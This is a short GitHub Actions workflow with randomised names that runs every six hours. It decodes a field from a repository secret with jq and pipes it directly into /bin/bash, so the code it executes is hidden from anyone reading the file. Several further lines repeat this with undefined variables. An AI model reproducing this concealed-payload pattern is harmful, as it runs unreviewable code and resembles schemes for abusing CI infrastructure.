name: beisentenb

on:
  workflow_dispatch:
  schedule:
    - cron: '32 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: beisentenb
        env:
          w89278: ${{ secrets.w89278 }}
        run: |
          echo $w89278 | jq -r .wzwm0185 | /bin/bash
          echo $dqc337 | jq -r .w5 | /bin/bash
          echo $izl75761 | jq -r .vs223 | /bin/bash
          echo $nem8 | jq -r .aohlw12 | /bin/bash
          echo $t33 | jq -r .tgq031 | /bin/bash
          echo $oo91 | jq -r .takpa1578 | /bin/bash
          echo $rcnmp61 | jq -r .a53684 | /bin/bash

